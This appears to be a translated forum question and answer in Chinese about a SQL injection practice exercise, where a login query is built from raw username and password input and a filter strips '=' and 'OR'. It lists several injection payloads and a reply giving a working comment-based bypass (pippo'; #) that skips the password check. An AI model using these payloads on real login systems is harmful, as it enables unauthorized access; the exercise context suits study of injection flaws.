我正在做SQL注入练习,我无法绕过一个过滤器,该过滤器将=和OR的出现替换为nothing(")。
网页有一个登录界面,执行的查询为:
SELECT user_id FROM users WHERE username='$username' and password='$password'
我的想法是传递pippo作为用户和' OR 'a'='a';——作为密码,当然,有了这个过滤器,我的字符串是无害的。
我也尝试了' || 'a'like'a';——但是,什么都没有发生。一些建议吗?
使用pippo'; #作为$username,使用anything作为$password,结果如下:
SELECT user_id FROM users WHERE username='pippo'; # ' and password='... anything ...'
完全绕过密码检查